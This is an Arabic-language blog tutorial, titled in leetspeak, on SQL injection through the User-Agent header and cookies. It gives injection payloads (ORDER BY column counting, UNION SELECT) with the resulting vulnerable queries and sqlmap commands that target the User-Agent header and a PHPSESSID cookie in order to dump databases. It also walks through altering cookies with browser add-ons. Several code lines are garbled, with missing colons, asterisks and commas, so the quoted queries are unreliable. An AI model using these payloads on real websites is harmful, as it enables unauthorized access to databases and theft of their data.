4chieve THE T4RG3T /Advanced Sql injetcion through http Header + Cookies

السلام عليكم ورحمة الله وبركاتة،


اليوم في شرحنا اليوم لايغيب عن بعض الناس ولكن البعض لايعلم عنه وهو استغلال الثغرات السيكول من خلال useragent, cookies



في العادة بعض المخترقين يقومون بفحص الهدف من خلال المتغيرات سواء كان الاستعلام او الطلب من
خلال GET,POST,HEAD في المتغيرات الواضحه في الصفحه، مثال.
اقتباس:
example.com/site.php?id=2 AND 1=1--+-
في العاده نقوم بفحص المتغير [id] من ثغرات السيكول ونكفتي بذالك ولكن هناك احتماليه بأن ن يكون اليوزر ايجنت والكوكيز مصاب لنه كلن منهم متغير. في الاول ناخذ تعريف بسيط ماهو USERAGENT, COOKIE

Useragent:هو المعرف لدى الويب ابلكيشن من حيث نوع الجهاز والمتصفح المستخدم للعميل مثال لليوزر ايجنت مثال

كود PHP:
User-AgentMozilla/5.0 (MacintoshIntel Mac OS X 10.7rv:31.0Gecko/20100101 Firefox/31.0 


حدوث الخطاء عندما يكون صاحب الموقع او السيرفر بحفظ نسخه معرف العميل"User-agent" في قاعدة بيانات ولكن حدوثها قليل من خلال الهيدر والكوكيز ولكن في بعض الاحيان فعاله خاصة في برمجيات Asp




طيب خلونا ناخذ مثال.



كود PHP:
 QuerySELECT FROM users WHERE ua='User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0' AND 1=--+- NU11


كما تلاحظون وجود خطا سيكول في الموقع.

استخراج عدد الاعمده بحكم انها بيسد
كود PHP:
' order by 1 -- +
query: SELECT * FROM users WHERE ua='
User-AgentMozilla/5.0 (MacintoshIntel Mac OS X 10.7rv:31.0Gecko/20100101 Firefox/31.0' ORDER BY 1 -- +' 
استخراج
الاعمدة المصابة

كود PHP:
' UNION SELECT 1,2,3,4,5,6,7,8 limit 1,1 -- + 
كود PHP:
querySELECT FROM users WHERE ua='User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0' UNION SELECT 12345678 LIMIT 1-- +
او يمكنكم استخدام اداة بالاستغلال الاوتماتيكي من خلال اداة Sqlmap من خلال امر
كود PHP:
python sqlmap.py -'http://website.com/useragent/ --level 3 --dbs 
عندما نرفع مستوى الحقن في السيكول ماب يقوم بالتجربه على User-agent/ Http header

-------------------------------------------------------------------------------------

الان نتجه الى الحقن عن طريق الكوكيز. في البدايه يمكنك الحقن من خلال اضافه فايرفوكس cookeis manger+ وايضا tamper Data + Sqlmap

بالاول خلونا نخاذ عن طريق CookiesManger+

نفتح الاضافه من الفايرفوكس ومن ثم نقوم بالبحث عن الموقع المصاب.



ثم نقوم بالتعديل على المحتوى من خلال EDIT >>> Content



والنتيجه


وايضا من خلال tamperdata

نقوم بستقطاع الطلب ومن ثم نقوم بتعديل على الكوكيز:



والطريقه الاخيره من خلال الستغلال الاتوماتيكي السيكول ماب من خلال امر.
كود PHP:
./sqlmap.py -'http://exme.com/vcat3.php?id=37#' --cookie='PHPSESSID=0e4jfbrgd8190ig3uba7rvsip1; security=low' -- --dbs --level 3 -p PHPSESSID -risk 2 


وهاذا والصلاة والسلام ع اشرف الخلق والمرسلين. واعتذر على التأخر واتمنى ان يكون الشرح مفيد دمتم في حفظ الله.

تعليقات

المشاركات الشائعة من هذه المدونة

CRLF injection [\r\n Carriage Return]

Study in Nosql-Injection-Mongodb